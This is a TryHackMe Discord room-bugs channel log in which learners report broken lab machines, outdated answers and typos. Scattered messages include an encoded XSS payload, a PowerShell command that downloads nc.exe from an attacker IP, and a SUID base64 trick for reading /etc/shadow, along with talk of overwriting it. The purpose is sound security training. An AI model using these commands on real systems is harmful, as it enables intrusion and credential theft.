thank you for the prompt reply, I'll keep at it

Gave +1 Rep to @rugged canyon

Room - Linux Privilege Escalation
LinkURL - https://tryhackme.com/room/linprivesc#
Task: Privilege Escalation: NFS
Error:
Pretty sure I've found a bug with Kali vs the remote host. When compiling C code then running it on the remote host I get "./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)"

So it seems the GLIBC version is mismatched on the Kali box vs the remote host. I was going to install an older version on the Kali box but I'm going to try with the Attackbox instead

Not sure if this is me or not but when I try and start the machince attached to https://tryhackme.com/room/linprivesc# task 3 nothing happens I waited 5 minutes and still nothing. But I am able to start the attack box

I've been having problems starting up machines most of today, I think there's something going on...

First time I've ever had the issue

It's a known problem right now, THM are looking in to it.

Oh yeah, just seen the posts in #site-support channel, thanks. 🙂

Gave +1 Rep to @quaint sparrow

Room - Network Services
LinkURL - https://tryhackme.com/room/networkservices
Task: Enumerating SMB, TELNET and FTP
Error: does not disploy the room

There are currently issues with some VM's on THM, staff are aware and working on it 🙂

Thank you very much for informing

Same is happening to me! Machine_IP doesn't update

Thanks!

Gave +1 Rep to @mild fossil

Yea I think all the deployable machines are down

Yep, I tried 3 different ones and was starting to think it was my machine, but neither my VMs or my host machine were connecting. GLad to know everything's in order on this end!

It fs is I’m sure they’ll fix it later today

well that is what you get for trying to cross compile... search for the error on this discord server and you will see countless examples of how to exploit it using living of the land and copying the bash from the target machine and giving that the suid bitr

Thanks, you're the best! Definite noob mistake here - I should have done a bit more searching in here before getting all stoked I'd found a bug, hah! Super useful for actual in the wild issues though as versions are going to be all sorts of mismatched!

Gave +1 Rep to @rugged canyon

no problem

there may be a bug with the redline room can Staff DM me

Can you describe your issue please

in DM so no spoilers

Here please, just use spoiler text ||message||

redline room task #4 question #2 Provide the BIOS Version for the workstation.
input the correct answer but it still says incorrect, watching several online walkthroughs they put in the same answer and answer is accepted

I have screenshots

I don't know what spoiler text is

can you fix it?

screenshots not spoiler free sent to your DM

#room-bugs message

thank you very much, that workaround was successful

VulnNet: Roasted, can take up to 6 minutes to boot and after 1 hour it shutdown by itself even if there almost 1h left. Just wanted to bring that up as it's not the first time I see that for Windows vm.

Hello, I have a small problem. I am currently at OWASP Juice Shop, task 5. After I click on 'About Us', the menu wont disappear. Could this be a bug?

Hello, I have a problem whereas I try to enter a room it will just get stuck on the loading circle and won't load the room, the bug appeared out of nowhere. I tried resetting the cache and cookies and using a different browser and nothing. the weird part is after I reset cookies it works, but as soon as I log in boom, endless loading circle

Hello, in Pyramid of pain (https://tryhackme.com/room/pyramidofpainax) it seems to me that Task 9, Practical: The Pyramid of pain actually does not work: I am sure, I have the text correctly assigned to the pyramid's floors, but it keeps saying, Whoops... Check your answers. Fortunately the flag is not needed.

Hi guys, I am getting error in opening this link

https://tryhackme.com/room/hackerofthehill

That won't work.

Its also private for a reason.

I'm not a mod, but staff have suggested not to use this to access private rooms.

OK, but ones in the past mod suggested me to do this.

I'm also speaking as someone who has been told to stop doing that trick to access rooms by the QA manager.

It was a friendly warning before a site ban was introduced.

Bypassing the private room screen may result in a ban.

Rooms that are private are not meant to be accessed for a reason:)

This isn’t a bug; private rooms are usually set private on purpose due to being outdated, old, broken, or no longer up to standards:)

I do understand that, but when a) link in official THM blog leads to a private room, b) link in a room from official path is referencing to another (private and basic) room c) you ask because you think it is a bug and you are told to use this "hack" here by mod. So how can I know others feels it is not suitable and worth for ban?

-> report the outdated room to staff and we will update it
-> report the outdated room to staff and we will update it
-> which moderator told you?

Muiri - see above #room-bugs message

Muiri isn’t a moderator or employee,

See two messages below: #room-bugs message

Hi to everyone... there is a machine "MarketPlace" that klick me out on the ssh service after 2 minutes that i'm in ...

In the past, based on the writeup, the machine dosen't kick out the user...

Hello everyone,

I'm in the room titled "File Upload Vulns v2.1", task 4, second question about uploading a file and getting the flag.

The website says I successfully uploaded the file but no flag appears. I know I got the correct file to overwrite because the previous question was correct.

Any information on this?

nevermind... I figured it out...

On https://tryhackme.com/room/ice
The linked room is private

in linux priv escalation theres a bug in suid room where it doesnt say nano is a suid biit using find / -type f -perm -04000 -ls 2>/dev/null is the walkthrough of room nano is listed but not for me

but i cant save or read the file fdor the questions

ohh yeah trying to use base64 suid

https://tryhackme.com/room/postexploit
Task 3, "File created from incompatible collector error" when putting the loot.zip into Bloodhound. I've generated the file twice, using the command given.

Spelling error in https://tryhackme.com/room/nmap01 Task 6 Question:
What is the option required to tell Nmap to use ICMP Echo to discover life hosts?
life should be "live"

there is warnning logo to not secure connection pn room : https://tryhackme.com/room/attacktivedirectory

Can you show a screenshot?

I can't do anything, I'm just interesting in what you mean.

cant' take pic since is that stupid drop down popup that disrepair when i try take pic. ill try

hmm

weird

I’ll check the image URLs when I get to my PC

should be fixed

@sharp citrus

sweet

Anybody know what this is about? This is in the NFS Section of the "Network Services 2" Room
Edit: Can't seem to attach a screenshot. Something's off about the text in that room under "Understanding NFS". Anybody else see it and know what it is?

Verify with the bot and then can send screenshots

Thank you, will do

!docs verify

Here's the screenshot

https://tryhackme.com/room/sakura
Unable to complete Task 5 "What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?".
The old URL that used to be the answer does not match and the current URL does not match

Anyone else having an issue in the Linux Fundamentals course where they get "Permission denied" when trying to SSH into tryhackme@[IP_address]?

It's the same with Linux Fundamentals 2 and 3. It seems the first time I try it works fine, but if I come back after a day and try again it keeps coming up as invalid.

I don't think there is a bug with that room, so best to move to #room-help and we can check there

ok, will post the same message there

hi

Hello

found a bug on the following room:
https://tryhackme.com/room/xss

Filter Evasion Section On Challenge 2:
my payload:
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#72;&#101;&#108;&#108;&#111;&#34;&#41";>
my payload has a pop up that says Hello, but I do not get the flag. @glad badger

cc @glad badger this is a never ending issue with this room; the payload is so specific

https://tryhackme.com/room/threatinteltools task 7 and 8
lets you download eml email files that according to the hashes of the attached files contain malicious/malware if you check them on virustotal or the other tools explained in the room

maybe it is intended to only be on the target machine that is in that room instead

On windowsfundamentals 3, task 3, the question is about a picture. The picture clearly states everything is fine with the computer, but the answer is that there is an issue with virus and threat protection 😛

In Sakura room Task 5 question 3:

What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?

even when i put correct link is showing wrong answer

#room-help

Task 2, files, discovery.py, line 5: this is the correct code: "from pymodbus.client import ModbusTcpClient as ModbusClient"
https://tryhackme.com/room/attackingics1

Thank you for posting this, that got me unstuck (using the THM box too).

Gave +1 Rep to @forest axle

Hi room bug when compiling code for task 11 on https://tryhackme.com/room/linprivesc
glibc version issue based on attacker machine. Need to update or suggest alternative

And compiling alternative glibc is a mess🥲

Hi, I think I found a bug in Password Attack Room, Task 8, SMTP

When trying Hydra output is:

[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized

which looks like server is not understanding AUTH commands.

EHLO pantoufles
250-mail.thm.labs
250-SIZE 10240000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING

AUTH LOGIN
502 5.5.2 Error: command not recognized

February 27, 2023
This was a huge help thanks, thought I was going crazy.

Gave +1 Rep to @raw crypt

Hello, the Zeek Room was the input with value incorrect.

https://tryhackme.com/room/zeekbro

This is a question.

This is the command:

I'm only seeing one result in the file. I looked at a Whiteup that said it would be 2, even though I had run the same command

@mild sequoia

Hi @copper tide
I just verified that it's working. Can you clear the logs and re-run the command? OR reboot the machine, please.

Hi,
breaching Active Directory room isn't working for me.
Web based AttackBox does not start with breachad interface (ip a doesn't show it) and obviously the AD machines don't respond to ping.
Tried VPN from my computer (and from Kali Web VM) and it exits with error:

Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: timers and/or timeouts modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: --ifconfig/up options modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: route options modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: route-related options modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: peer-id set
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: adjusting link_mtu to 1624
Thu Mar 23 14:19:21 2023 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
Thu Mar 23 14:19:21 2023 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
Thu Mar 23 14:19:21 2023 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
Thu Mar 23 14:19:21 2023 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
Thu Mar 23 14:19:21 2023 Error: problem with tun vs. tap setting
Thu Mar 23 14:19:21 2023 Exiting due to fatal error

Same running in AttackBox

openvpn Desktop/NetworkConfigs/breachingad.ovpn

I keep finding issues, is that normal or it's just me?

#site-support

Thanks

Gave +1 Rep to @hazy tiger

Definetly a bug. I had to edit the .ovpn file, change dev breachad to dev tun and change command in the room:

[thm@thm]$ systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com

to

[thm@thm]$ systemd-resolve --interface tun0 --set-dns $THMDCIP --set-domain za.tryhackme.com

Cc @glad badger @dusky junco any guidance here? Has anything changed?

With these little changes I was able to complete the room

I noticed also that if the network goes down the page reports it is running anyways

It looks like the backend setting that sets the interface as "breachingad" rather than tunX has broke somewhere along the line. @crystal bolt any ideas?

I'm not in control of the actual VPN server itself. Only the network. If I can get Internet IP of that VPN server I can take a look and alter it's configuration. But haven't had any issues with these VPN servers thus far. If I get that IP I can SSH in and check what it is outputting as ovpn files and see if a change is required.

The adapter name should be breachad and not tun. That is by design and hasn't given us an issue in the past, so might just actually be cipher support that needs to be updated

@hollow star In the https://tryhackme.com/room/nmap03 room the
The concept is simple, make the scan appears to be coming from many IP addresses so that the attacker’s IP address would be lost among them.
line has a grammatical mistake, usage of the verb "make" without a subject.
Here's a good correction:
The concept is simple, make the scan appear to be coming from many IP addresses so that the attacker’s IP address would be lost among them
Please fix this, thanks in advance! 🙏

Please can you send the remote IP in your VPN file. It will tell me which vpn server to inspect

Cross-site Scripting room, Blind XSS, the recommended tool is now depreciated, but there is a new open source fork of it

Hi lateral movement network iis server is offline, can it be rebooted please

52.50.154.50

Found the issue thanks. dev breachad is correct, but from client-common it was missing the second line with is dev-type tun. Issue should now be resolved

Gave +1 Rep to @hidden juniper

A good pentester should be able to fix issues 😉

Fixed. Thanks for pointing this out. 🙂

Gave +1 Rep to @prisma bronze

Room https://tryhackme.com/room/passwordattacks, Task 8, Brute Force SMTP.
Server does not support SMTP AUTH LOGIN:

# telnet 10.10.135.120 25
Trying 10.10.135.120...
Connected to 10.10.135.120.
Escape character is '^]'.
220-mail.thm.labs ESMTP
220 mail.thm.labs ESMTP
EHLO pippo.com
250-mail.thm.labs
250-SIZE 10240000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING

Np, thank you for fixing it 🫡

oh yeah that problem... if only shadow could recall the exact solution right now

think the solution to get the flag is to just use smtps instead

i.e the secure smtp

which would be on port 465 instead

still yeah the instructions in the room probably need updating

Will try that

It worked, thanks. I did an nmap scan, seen port 465 open, but didn't considered trying with SMTPS 😅

Gave +1 Rep to @rugged canyon

no problem

still technically a bug with the room

Dunno if anyone else has let you know, but should be sorted now

yeah this is shadows third reminder that this is now fixed... thanks for the info though robert

Gave +1 Rep to @misty cave

Do you want a fourth?

hehehe sure

we now got at least 3 people who get a white screen when deploying the target machine for linux fundamentals 1 and therefor can not access the target machine to learn these basic commands... is it already on the ticket list to see if it can be fixed???? @glad badger @dusky junco

I checked and now it works correctly. Now just one more question regarding the Brim room, has the installed software been discontinued? I don't find the correct option to install on my Kali Linux or Windows. Thanks.

Gave +1 Rep to @mild sequoia

In the Windows forensic 1 and Redline room the problem also happens

oh should shadow have reported that in there instead????

Not really a bug but incident handling with splunk task 9 references threatcrowd, that site is no longer available. cert goes to the wrong address and server sends a 503

i don't know where else to post it

the questions don't need the site though

Volatility room:
Installation described wrongly. Recommended to use the following:
https://github.com/volatilityfoundation/volatility/wiki/Installation

Believe theres an issue with the what appear as the private room ccpentesting where I'm getting this error

what room is linking to that????

Encryption - Crypto 101

well thanks for that info... ccpentesting was marked private because it is very very old and don't meet the qa standards anymore if shadow recalls correctly... so this is technically a bug in the encryption crypto 101 room if it links there

It's link from this question regarding additional help as a hint; Would there be an alternative direction for assistance for this question?

there is a room on john the ripper that might help

https://tryhackme.com/room/johntheripper0 @ebon lark

Thank you

Gave +1 Rep to @rugged canyon

no problem

https://tryhackme.com/room/ctfcollectionvol1 task 5 appears to want you to examine html code for a flag but doesnt provide a file to examine to get that flag.

........ scratch that i feel silly now i seeked a writeup

@ocean patrolsirknyght hi. I am trying to get the Corp room first item to work and can't get it to work. I searched and found you solved it. Can you help me with the first step. I get an error about 2 argurments on download file. I typed: powershell -c "(new-object System.Net.WebClient).Downloadfile('http://10.8.133.41:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')"

I have found bug in SQL injection lab room from task 7
Here is photo from that task. When I run this command from attackbox, sqlmap didn't know --second-url command then I tried to learn sqlmap. I found --second-order is alternative to --second-url, I mean --second-url command doesn't work.
There is second bug also in this room
so-temper.py file that I downloaded from this room is not valid for sqlmap

unless i am mistaken somewhere, i don't think that 'mountain view' is the most popular city under Google ASN

also this should be debian.

Hey there,

I believe you are supposed to be answering questions on the screenshots in the room

Were you able to figure out and/or did anyone every contact you on this? I'm running into the same issue right now.

would help if shadow had done said room

Hey guys, at https://tryhackme.com/room/snort room, at Task 8, there is referenced non-existing file at the VM (icmp-test.pcap).

No I never got contacted about it and if I did get contacted I never saw a message.

I'm pretty sure I ended up just dropping the room

What are you saving?

I'll have to look when I'm off work/ try and remember

check the exercise files

if they're not there you accidentally deleted them or something else went wrong, reboot the machine in that case

Thanks, yeah probably accidentally delete them. 🙂

Gave +1 Rep to @manic raft

Are you able to get root??
https://tryhackme.com/room/linprivesc
Task 7 Privilege Escalation: SUID

Can someone please help

don't think you can easily gain a root shell there.. but you got arbitrary file read so yeah

I am able to read /etc/shadow using base64
but unable to get root

oh wait you probably have arbitrary file write too....

by redirecting the output of base64 into /etc/shadow you could probably get a root shell

though if you go that route good luck and be careful so you don't screw up the machine

you technically don't need a root shell to get the flag

I tried but getting Permission Denied error

ah okay then

if you know where the flag file is you could use the base64 binary to read the flag the same way you read /etc/shadow

which is the intended solution

I am able to read the flag. but my aim is to get root

same for /etc/passwd as well

shadow never got root on that either but good luck ¯_(ツ)_/¯

What setuid are you trying to abuse?

base64 is the suid binary in this instance

hence arbitrary file reads

@twin halo Try:

LFILE=/etc/shadow
./base64 "$LFILE" | base64 --decode

well think the used password for the root account is to hard to crack for getting a root shell that way if shadow recalls correctly

You can't write with it, only read.

If you can execute sudo, you can drop a shell

this is basically just a bonus challenge sumit set out for themselves

Yeah I am able to read files. But I want root shell

Can you run sudo?

I tried this

No

I tried to append the /etc/passwd and /etc/shadow through base64
But the files are unwriteable

As the Task 7 is about SUID, I am not sure how to get root

sudo permissions are not available to all 3 users

It doesn't ask you to get root?

The task is not asking to get root.

Yes, not every technique will allow you to get root:)

So need to look other techniques?

If you were doing a CTF, yes, but this is a learning box. They might not want you to get root at this particular point so that you don't break the challenge

Ok thanks! Just wanted to confirm 👍

However, I always try to get root even if it is not intended in the task. I do not break 🙂

Gave +1 Rep to @hazy tiger

Yup! I appreciate your mindset, it is very can-do!
Just ensure not to presume there's always an option to get root, often times you're making your job harder than it needs to be:)

Hi, the following room hasn't been maintained and the answers don't match the data found online anymore. It was a nice room and it would be a shame to "lose" it. The creator seems to be unreachable. What could be done in this situation? Room: https://tryhackme.com/room/webosint

@hazy tiger ⬆️

Done!

Done!

i am in "Credentials Harvesting" room and in task no 6, there isn't any password for 10.10.237.226 SMB in windows credentials vault. i have have extracted them through mimikatz

Hi everyone, I can't see the pictures from tasks "Listeners" and "Stagers" in room "Empire". As far as I can see, the images are corrupted in these tasks. Can the mods take a look at this?

Room link: https://tryhackme.com/room/rppsempire

Just an FYI, moderators aren’t employees, please read #rules

Sorry for that, I didn't know.

I am getting a different error. I have done the steps several times, but when I get into bloodhound and try to check a query, I always get this error: "NO DATA RETURNED FROM QUERY."

hello

i'm stuck

in Linux Fundamentals 2

can't access the attackbox with ssh tryhackme@"ip"

i put the password "tryhackme" but the bash tells me "Permission denied, please try again."

Have you started the machine in task 2?

Same here ..

You're 99% more than likely to be using the wrong IP.

yes

i was connected with the openvpn and started the attackbox

#room-help @plucky finch And please verify your account so you can send screenshots

!docs verify

ok

one sec

now i can't start the virtual machine bcause my account isn't premium

If you're on a VM you don't need the attackbox.

do u mean

i can use the terminal to do it?

On your Vm, yes. 🙂

oh

ok

i'll try

You'll use that IP there.

ok

wait

one more question

do i have to connect the openvpn in my vm or on my own device?

Yes.

You'll always need to connect to OpenVPN so you can talk to THM machines.

in the vm and in my pc, right?

On your VM, yes.

Not your host.

ok

ty

Do you know how to, yes?

sure

i know

🙂 great, happy hacking.

ty

it works, ty so much :D

@quaint sparrow

What to do

room printer hacking 101

root@ip-10-10-236-74:~# git clone https://github.com/RUB-NDS/PRET && cd PRET
Cloning into 'PRET'...
fatal: unable to access 'https://github.com/RUB-NDS/PRET/': Failed to connect to github.com port 443: Connection timed out

Not a bug, you need to be a subscriber to access the internet from the attackbox

Oh i will try it just expired now lol thank u bro i will check

Gave +1 Rep to @eternal summit

https://tryhackme.com/room/investigatingwithelk101
On the 11th, which IP caused...
But the spike is on the 10th.

I'm working

Hi There! Having some issues with the Local Potato room (https://tryhackme.com/room/localpotato). Every time I launch the machine it won't connect. Trying to connect via Remmina and xfreerdp on the TryHackMe VPN it is indicating that perhaps the "user" user's password has expired.

[09:55:11:311] [3148049:3148050] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[09:55:11:311] [3148049:3148050] [WARN][com.freerdp.crypto] - CN = LP
[09:55:12:814] [3148049:3148050] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_PASSWORD_EXPIRED [0xC0000071] from server
[09:55:12:814] [3148049:3148050] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_EXPIRED [0x0002000E]
[09:55:12:814] [3148049:3148050] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[09:55:12:814] [3148049:3148050] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

If someone could take a look and get this resolved that would be awesome! 🙂

@eternal summit

Done!

Done!

Hi, looks like there might be some problems with https://tryhackme.com/room/investigatingwithelk101 .

In task 4 where the machine gets booted it is not possible to connet to the machine "website" via the attackbox. I had the same error yesterday, and this is now the third try, i have tried following a walkthroug but it did the same thing as i did

hey 🙂 if you're seeing the 502 gateway error with this, this means the service hasn't started up yet (ELK is quite beefy). I would recommend waiting at least 5 minutes (and even then I'd probably wait closer to 10)

For the error on the left, I've never seen that on ELK before O.o. Probably related to things not starting up properly yet. But yeah, I would say deploy the machine, wait about 10 minutes to be safe and it should work okay 🙂 If you're having to wait longer than 15 minutes to be able to login to ELK then I would terminate & re-deploy the machine and try the process again

after 8 minutes I can login

Thank you, it worked. could swear i had tried to leave it running for 15 minutes, but it worked where i left it running for 10 minutes 🙂

Gave +1 Rep to @dusky junco

Yeah, unfortunately it's a little bit "luck of the draw" in that sense. Applications such as ELK are really beefy, and even though we give it a considerable amount of resources, it can still take a bit of time to boot up.

Glad to hear it's all sorted now though!

Got this on the new SDLC one

The "final" part is what's probably confusing, it's not a bug though, the initial 1M has been spent, and you only made back 1.7M, instead of 2+

oh, I get it now

Thanks :)

Np

made a lot of money

@crystal bolt This might not be completely intended though, made 18 trillion dollars

Linux Fundamentals Part 1

Task 7 Questions
If I wanted to replace the contents of a file named "passwords" with the word "password123", what would my command be?

Accepted Incorrect Answer:
echo passwords >> password123

This isn't a bug, your syntax is wrong.

but it accepted it as correct

thats why im reporting it

refresh your page, it could be answer tolerence.

yeah, game has a lot of factors and a couple ways for you to earn ridiculous amounts of money. We are not balancing the meta for this game for like a year so have fun and see how much you can make 😉

Fair haha

Hello, does anyone know how I can let admins know that the answer to a task in a room is wrong due to updates?

Can you please state the room and question please

Burp Suite: The basics room
Task 7:
In which User options sub-tab can you change the Burp Suite update behaviour?
Answer: misc

Answer is wrong for Burp Suite Communiuty Edition v2023.2.4

I think I found a bug not sure what to call it but I am having an issue when after starting the machine for this room task 7: I used it for a little than took a short break and came back to this bug
https://tryhackme.com/room/linprivesc#

Send the thm bot verify

Hey 👋 can you try terminate and re-deploy the machine attached to that task please? This sometimes happens. If you still have the problem after terminating and re-deploying, can you open the view up in fullscreen by pressing the two arrows in opposing directions on the bottom right of the screen and sharing the URL please?

https://remote-eu-09.tryhackme.tech/#/client/MjAwMzExMgBjAG15c3Fs?token=801410A7BAE67C9E2775E6FDFD0599A8491FF33ED317959885ACD9A8096DAD5D

Thanks for sending this on. I'll forward this internally.

In the mean while, the credentials to access the machine using SSH are at the top of the task. You can either use your own device (connected to the VPN) or the AttackBox 🙂

Gave +1 Rep to @paper grotto

I tried the karen and password but it didnt work

The credentials worked for me. Are you trying to SSH into the IP from the card at the top of the room? (replacing the IP address with the one that you see). Otherwise, double check the capitalisation of P and the 1 at the end

Username: karen

Password: Password1

Oh no I was trying to login through the screen that it showed me but thank you

Gave +1 Rep to @dusky junco

in room "snort", Task 3, Question "According to the official description of the snort, what kind of NIPS is it?" - the answer is not a NIPS type, it is a description at best.

just checked, its marked correct with the correct answer

In same room, a script called traffic-generator is required, it relies on "tcpreplay" which is unavailable. It cannot be installed with apt because the box has no internet connectivity.

Hey folks, how's it going? I hope you guys is doing well, look... quick question...Does anyone notice that some machines it's going been terminated when we are in of them? like when I got the shell...it pass some minutes, the machine it's terminated, and I need to restart again
Archangel and ColddBox: Easy --- it's an example of this issue that I got today and yesterday

i think i found a bug

vulnversity

there are 4 ports open

or i'm wrong?

there are some other ports open

what command did you use with nmap?

your missing ports ||21 & 22||

nmap -sV

im trying -nP now

now shows all the 6 ports

ty, Jay

not sure why it didn't detect the first two

hi

in the intruder module i did the challenged and fuzzed all the cred but not a single one is right

and they all have the same length

i made sure that i am using the right username/password wordlist

👋 Could you go to #room-help please and give the room your on, and the parameters for the intruder

ok

Bug Summary: Unable to connect to THMDC network in Enumerating Active Directory
Pages affected: https://tryhackme.com/room/adenumeration
Bug description: Unable to connect to the THMDC network in the Enumerating Active Directory room. The IP address of THMDC is 10.200.68.101, and the VPN connection is working fine without any problems when connected using a breached ovpn file. Please reset this machine or make it available as soon as possible.

box wont terminate, has expired, reload the page and still hasn't terminated even after I click repeatedly to terminate, cant ping it, Windows PrivEsc v1.0, waited almost 2 hrs for it to expire before I could start machine again and finally ping it. what can I do in future when this happens on a box to not lose time?

Are you using the VPN pack for this room?

yes

Have you changed the nameserver to that THMDC?

yes, added the IP in DNS servers

Can ya take a screenshot?

I'm going to try connecting,

Are you in a VM or Attackbox?

I've connected.

I had to correct my data-ciphers on my script, changed my nameserver (placed it at the top too)

If you're still having issues, ping me and I can help. 🙂

I am not sure whether this is a bug or not but the SOC level 1 pathway > sysinternals room> Networking utilities section. This section has a question and the answer is very clear Microsoft Corperation but the answer is not accepted even though it is the correct answer.

Send room URL?

Sysinterals https://tryhackme.com/room/btsysinternalssg

somebody else reported this yesterday and I tagged you there

Yep that is the one

I know, I'm the reason the answer was updated

@hollow star Hey, did this get updated back to Microsoft Corporation?

Talos Intelligence changed the owner info to microsoft azure as per https://talosintelligence.com/reputation_center/lookup?search=52.154.170.73. So I changed the answer accordingly especially that the hint already guides the user to use Talos. If you think this is still causing confusing please let me know. 🙂

I have received a few emails regarding it also, possibly adding a note might clear it up if there isn't one already? :)

@junior shore @placid abyss

I just run whois and it does not give the same answer as Talos... I will fix that.

Most sites don't

It seems talos is the outliner

Since WHOIS and Talos Intelligence are giving different answers, I decided to stick with WHOIS since that's what's written in the original question. I updated the answer (again) and updated the hint accordingly. I hope it won't cause ambiguity any more. 🙂

Thank you B)

Thanks

this might be a bug or I did something incorrectly. Anyways: when I grabbed the bash file (note I downloaded the file directly from github on the attackbox, the wget wasn't working for me) it's base perms were 644, not 645. doing sudo chmod -s bash didn't give me the final -x (645) that the room questions say should be there. Idk if this has to do with the way I obtained the file or if there's a missing step here. I had to chmod 645, then chmod -s to get the bash file with the required permission line.

Did you download the bash, or the html?

Should be 755

bash

I ran 645 then -s and that worked

It might have worked but it wasn't correct

It should be rwxr-xr-x

the -s sets the execute to S for owner / group, so I'm not sure the 7/5 for owner / group are needed.

Capital S is wrong.

Capital S is SUID without execute. Incorrect and useless.

yeah it's chmod -s, capital S there is case ignored so it counts as correct

That's incorrect

It shouldn't be accepted, it's just within tolerance.

I meant on the questions

when I actually ran the bash script is had lower case s

does 755 / 645 actually matter given that you end up changing the x to s anyways?

Yes, because you're only changing one of them in that case. Please see my earlier messages about what 755 means and the difference between S and s.

oh I get it now, ty

Windows internals room - Virtual machine does not connect

Done!

@dusky junco

Done!

ta:)

Problem with /room/intromalwareanalysis

It wants us to have a look at the existing report from given date and platform on hybrid-analysis based on the hash of redline.
When you do, well..
https://hybrid-analysis.com/sample/e8ba49a75de083cb786e8ed84972affa11542dd913f1a07b0d44e1d45e5e22e9/622f708708751066e8250d8e

The analysis doesn't exist anymore.

/room/phishingemails4gkxh has a terrible example of "how public key cryptography works."
Shows a demonstration of how it can be used to verify sender, but useless as per secure messaging.

(It's one way, but hardly the best way, nor what the wording and image imply.)

(Also a broken link on this same task I guess I could've mentioned that too ^_^;)

Why is it that when I'm in Windows PrivEsc room with xfreerdp running and I extend the time before it expires, it disconnects my RDP and then I can't even ping the target anymore?

How long has passed on the timer?

At https://tryhackme.com/room/wiresharkpacketoperations, Task 5, the last question: What is the number of "type A DNS Queries" - expecting two-digits number, however Wireshark offers me only 3-digits one answer.

Hello good people. Just finished SDLC room and found a typo in materials. Specifically - Task 4 SDLC Phases Part 2 - Chapter 7. Operations and Maintenance. The text goes "As example of this would be Vagrant or Ansible. The code controlling operations systems must be stored, versioned, secured, and maintained.". I think it should be "An example...". Thanks. Keep up the good work.

Junior Pentesting Learning Path, Cross-Site Scripting room xssgi Task 6: Blind XSS links to xsshunter.com, this website is deprecated, no longer maintained and sign in has been disabled

I’ve just run into this myself.. wondering the same 🤔

Burp Suite: Intruder Task2: What is Intruder :
In some Burpsuite versions in Intruder Options changed name to Settings

Just here to report the same issue with ssh and Linux forensics. Username is actually lowercase ubuntu, password didn't work, and ssh only allowed public key auth.

To fix I did open split view to modify /etc/ssh/sshd_config to re-enable password authentication, restarted sshd with systemctl, then changed ubuntu's password to match the room using a sudo -i session. Can log in fine after quick bit of Linux admin lol

Huh, similar thing for Intro to Malware Analysis, in this case the ubuntu account credentials didn't work, but that's all this time. Both rooms are by umairalizafar. Guessing this hasn't come up as much since more people use split view more often than ssh via VPN

No big deal, yet again just reset the credentials using sudo -i and passwd

I know one of the malware rooms is advised to be done in the attackbox, to avoid people putting malware on their vm

Yeah this intro one is just even more preliminary than the other existing Malware Analysis rooms. The credentials here do not work in ssh, but to be fair this room leaves vague what the credentials are for

hello

Is this the right place to report broken images in rooms?

yes

the shodan room: https://tryhackme.com/room/shodan has some broken images

@green steppe

I also want to point out that several answers in the shodan room are outdated and the results shodan reports have changed

I'm almost certain there's a big bold disclaimer about this as it's not feasible to keep updating the answers

I am in Windows Forensics 2 and the VM says the requested connection doesn't exits - does the VM just not exist anymore, or is it a network issue?

In the Network Services 2 room, Task 2 there seems to be a broken img link

In the Advent of Cyber 2 [2020] room, task7, the reverse shell is not uploading, normal ?

@gleaming shadow free nitro!1!1!!1

Done!

The exploit https://github.com/Nwqda/CVE-2022-26134 linked for this room https://tryhackme.com/room/cve202226134 is dead (github user account removed).

In the Burp Suite Room in Task 7 at

In which User options sub-tab can you change the Burp Suite update behaviour?

The answer "misc" is no longer correct in the newer versions of Burp.

Known issue^

I don't see it in #1092490706385383524 ?

Mhm

@hazy tiger

or might @raw bison

saw juun active in #general recently

@queen sphinx then

Mhh

gotta ping them all

-ban 937434386364792914 Nitro scam

🔨 Banned EDCHAVESP#9519 indefinitely

do i get cookie or smth 🙂

https://tenor.com/view/cookie-sendcookie-bestie-politeonthinice-lilmoneybigboy-gif-19249828

@raw bison

this is verified user =/

-ban 385032386003599361 -ddays 1 Nitro scam

🔨 Banned 4s0ck3t#6967 indefinitely

Happens to verified users too 😄

true

Ah was going to test the bot on them

ok. ill ping you next time then hehe

Tried TMM first, wasn't working

Yup, I was grabbing the stack dump, I think discordjs has had an update

Seems to be fine

Hello I’m doing « The Marketplace » room and I have find the ssh password and users but I cant have access to the machine.

I have check on the writeup and I have correct for the password, the ip adresse and the user’s name

Sorry for my English I’m French

https://tryhackme.com/room/rppsempire
The room does not load images.
Main Sections affected: "Listeners" and "Stagers"
but a few images do not load here and there

Done!

|| ||

is this considered to be updated ?

Pretty sure there's a big note in the room saying not to report these as bugs?

In the room Vulnerabilities 101, task 4, the answer to the second question needs to be updated as the author has rebranded.

Edit: not a bug, read the engagement terms and notes
Room URL: https://tryhackme.com/room/internal
Summary: Broken service
Additional Notes: (spoilers for people attempting): ||the wordpress site on target_ip/blog is broken, the theming doesnt work and any links on the website contain internal.thm instead of target_ip , making navigation difficult and login essentially impossible. ||

This is not necessarily a bug with the room, but more a problem with ||wordpress|| in general. You need to add the IP and domain that the ||wordpress ||is on to your /etc/hosts file 🙂 i.e.

TARGET_IP internal.thm and this

I am genuinely stupid, thank you Ben for the helpful reply :)

Gave +1 Rep to @dusky junco

